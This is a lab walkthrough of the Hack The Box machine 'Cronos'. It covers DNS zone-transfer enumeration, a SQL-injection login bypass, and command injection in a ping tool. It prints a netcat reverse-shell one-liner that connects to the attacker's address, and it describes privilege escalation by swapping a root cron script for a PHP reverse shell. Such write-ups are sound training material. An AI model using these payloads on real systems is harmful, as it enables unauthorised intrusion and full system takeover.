This box was a medium level linux box on HTB created by ch4p, it started with emunerating dns to find vhost cronos.htb and admin.cronos.htb, then the bypassing login page on admin.cronos.htb by sqli. After that we use command injection on ping utility to get a reverse shell as www-data. We privesc to root from www-data by modifying a script artisan that is running every minute by a cronjob as root.
As always let’s start off with nmap script nmap -sC for default scripts Alright, if it isn’t obvious yet I am a IPPSEC fanboi. Aight, firing up nmap to scan all open ports on the box.
And here is our nmap result
Aight let’s start enumerating the webserver first, as well as run an all port scan.
Enumerating the web server
Seems like a default Apache page, running gobuster for directory bruteforcing but it found nothing D:
Enumerating the DNS server
First we use nslookup to find the base domain that is cronos.htb, here we use 10.10.10.13 as our dns server by -server 10.10.10.13 and enumerate 10.10.10.13.
Now we can use zone transfer to enumerate more.
And we discovered admin.cronos.htb, cronos.htb and ns1.cronos.htb, let’s add them to /etc/hosts and now we can start enumerating these subdomains.
Enumerating the cronos.htb
A php website build using laravel. Running gobuster again but wasn’t able to find anything useful again, then I searched for laravel exploits using searchsploit.
Exploit 1,2,4,5 can easily be discarded and seems like for exploit 3 we need App_token but we don’t have lfi or any other vuln that can be used to dump it. So shifting my focus to admin.cronos.htb.
Enumerating the admin.cronos.htb
A login pannel, I tried default creds like admin:admin & admin:password but they didn’t worked and from response it seems we can’t even enumerate users.
Trying SQLi payloads on the admin login page on admin.cronos.htb, ' or 1=1 -- - worked and we bypassed the login page, now we have access to Net Tools.
Discovering command injection in the ping utility.
Exploiting command injection vuln with this netcat reverse shell payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 9889 >/tmp/f from pentestermonkey.
And looking at our netcat listner, yep we got a shell as www-data.
Getting the user flag is easy as www-data has perms to read the flag.
www-data had read and write perm on artisan script, so I created a php reverse shell in my host system using this pentester monkey php reverse shell and then replaced it with the artisan script on the box.
Checking our netcat listner and we get our root revshell.
Hope you learned something new, if you face any issues / have any query, feel free to contact me on social media.